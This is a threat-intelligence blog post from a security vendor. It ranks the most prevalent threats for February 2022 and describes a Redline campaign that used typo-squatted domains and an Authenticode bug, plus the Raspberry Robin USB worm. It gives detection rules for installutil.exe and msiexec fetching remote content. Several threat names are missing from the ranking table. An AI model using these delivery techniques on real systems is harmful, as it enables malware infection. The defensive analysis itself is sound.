Resources Blog Detection and response

Intelligence Insights: March 2022

SocGholish reclaims the top spot, Redline activity is on the rise, and detections associated with Raspberry Robin increase.

The Red Canary Team

Each month, the Intel team provides Red Canary customers with an analysis of trending, emerging, or otherwise important threats that we’ve encountered in confirmed threat detections, intelligence reporting, and elsewhere over the preceding month. We call this report our “Intelligence Insights” and plan to share a public version of it with the broader infosec community from here onward.

Highlights

As we’ve done for the past few months, we again looked at the 10 most prevalent threats encountered in the environments that Red Canary monitors. These prevalence rankings are based on the number of unique customer environments in which we observed each threat. Here’s how the numbers shook out for February 2022:

February rankThreat namePercent of customers affected
February rank:

1

Threat name:

SocGholish

Percent of customers affected:

1.8%

February rank:

2

Threat name:Percent of customers affected:

1.5%

February rank:

3

Threat name:

Impacket

Percent of customers affected:

1.3%

February rank:

4*

Threat name:Percent of customers affected:

0.9%

February rank:

4*

Threat name:

Gootkit

Percent of customers affected:

0.9%

February rank:

6

Threat name:

Coral Crane

Percent of customers affected:

0.7%

February rank:

7

Threat name:

Remote Utilities

Percent of customers affected:

0.6%

February rank:

⬇ 8*

Threat name:Percent of customers affected:

0.5%

February rank:

⬇ 8*

Threat name:Percent of customers affected:

0.5%

February rank:

8*

Threat name:Percent of customers affected:

0.5%

February rank:

8*

Threat name:

CypherIT

Percent of customers affected:

0.5%

February rank:

8*

Threat name:

Bundlore

Percent of customers affected:

0.5%

February rank:

8*

Threat name:

Redline

Percent of customers affected:

0.5%

= trending up from previous month
= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Observations on trending threats

SocGholish reclaimed the top spot in February after a brief respite in January, when it dropped to the middle of the pack. Despite this, Red Canary did not observe any secondary payloads delivered by SocGholish last month. Several of the detections contained multiple scriptloads typical of discovery activity.
Rounding out the top 10 are several usual suspects—Mimikatz and Impacket remain in the top three, and Emotet and Qbot phishing campaigns continued to haunt inboxes. The activity cluster we recently dubbed “Coral Crane” cracked the top 10, and Raspberry Robin, another new activity cluster, just missed the rankings. You can read more about Raspberry Robin below and about Coral Crane in the February Intelligence Insights.

What are all those squiggly Redlines?

Rounding out the bottom of our top 10 list is Redline, a malware-as-a-service information stealer. Red Canary began observing an uptick in Redline activity in February due to a new campaign that abused Google Ads to deliver binaries masquerading as various Notepad replacements, such as Notepad++ and Sublime Text. In this latest campaign, Redline payloads were delivered via domains containing misspellings, such as notpaad[.]com and sublimettxt[.]com. The payloads used a known bug in Authenticode to appear as if they are legitimate signed binaries.

To thwart this bug, Microsoft provides guidance to enable strict Authenticode verification that would inhibit payloads of this type from executing with invalid signatures. However, enabling this functionality may break older applications. Maintaining a strong software management process with centralized distribution of approved applications can prevent well intentioned users from falling victim to lookalike decoys.

 


Detection opportunity: Installutil.exe making external network connections

This detection opportunity identifies activity associated with adversary tools that deliver Redline.

process == installutil.exe
&&
has_external_netconn == true


New Raspberry Robin activity cluster

As far back as January 2022, we’ve observed an uptick in detections associated with Raspberry Robin, a Red Canary activity cluster involving a worm that spreads via USB drives. This worm may appear as a shortcut (LNK file) masquerading as a legitimate folder on a USB device. Once executed, it can beacon back to a compromised QNAP storage device for command and control.
Since we began tracking this threat only recently, our analysis is ongoing and we don’t yet know the extent of its capabilities. Based on activity we’ve seen so far, organizations that rely on USB devices should be aware of this threat.

 


Detection opportunity: msiexec contacting a remote host over HTTP 

This detection opportunity identifies the Windows Installer Tool, msiexec.exe, contacting a remote host over HTTP. Raspberry Robin uses this technique during its infection process, and this opportunity will also catch other threats that perform similar actions.

process == (msiexec.exe)
&&
process_command_line_includes == (http://, https://)

 


 

 

ChromeLoader: a pushy malvertiser

 

Intelligence Insights: May 2022

 

The Goot cause: Detecting Gootloader and its follow-on activity

 

Marshmallows & Kerberoasting

Subscribe to our blog